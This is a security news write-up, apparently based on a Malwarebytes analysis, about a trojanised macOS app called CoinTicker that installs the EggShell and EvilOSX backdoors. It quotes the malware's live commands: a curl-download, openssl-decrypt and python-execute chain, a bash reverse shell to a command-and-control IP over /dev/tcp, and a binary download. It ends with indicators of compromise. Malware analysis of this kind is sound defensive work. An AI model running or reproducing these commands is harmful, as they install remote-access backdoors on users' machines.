CoinTicker app actually appears as a legitimate application that helps to peoples who is willing to enter into cryptocurrency industries and make an investment.
This is working in a way to displays the menu bar along with the different cryptocurrencies price along with the ICON.
CoinTicker App will also display the various cryptocurrencies price list , market, countries details where people can choose the different coin and name to know the current status of bitcoins.
Researchers believe that it could have been a supply chain attack, in which a legitimate app’s website is hacked to distribute a malicious version of the app.
Backdoor Installation and activities
Initially, once the App launched, it tried to download 2 different malicious components (EvilOSX and EggShell) installed into the user’s device and both backdoors referred as a open source.
Later it make an attempt to connect with command and control server download a custom-compiled version of the EggShell server for macOS.
nohup curl -k -L -o /tmp/.info.enc https://github.com/youarenick/newProject/raw/ master/info.enc; openssl enc -aes-256-cbc -d -in /tmp/.info.enc -out /tmp/.info.py -k 111111qq; python /tmp/.info.py
According to Malwarebytes, The first part of the command downloads an encoded file from a Github page belonging to a user named “youarenick” and saves that file to a hidden file named .info.enc in /private/tmp/.
Next, it uses openssl to decode that file into a hidden Python file named .info.py. Finally, it executes the resulting Python script.
In this case, info.py perform various tasks and initially it using a command following command to connect with the C&C server.
nohup bash &> /dev/tcp/18.104.22.168/2280 0>&1
later it downloads the the EggShell mach-o binary, saving it to /tmp/espl:
curl -k -L -o /tmp/espl https://github.com/youarenick/newProject/raw/master/mac
Extracting the script reveals that it is the bot.py script from the EvilOSX backdoor made by Github user Marten4n6 and this script will communicate with a server at 22.214.171.124 on port 1339.
This both EggShell and EvilOSX are broad-spectrum backdoors that can be used for a variety of purposes.
Indicators of Compromise
/private/tmp/.info.enc /private/tmp/.info.py /private/tmp/.server.sh /private/tmp/espl ~/Library/LaunchAgents/.espl.plist ~/Library/LaunchAgents/com.apple.[random string].plist ~/Library/Containers/.[random string]/[random string]
CoinTicker.zip f4f45e16dd276b948dedd8a5f8d55c9e1e60884b9fe00143cb092eed693cddc4 espl efb5b32f87bfd6089912073cb33850c58640d59cb52d8c63853d97b4771bc490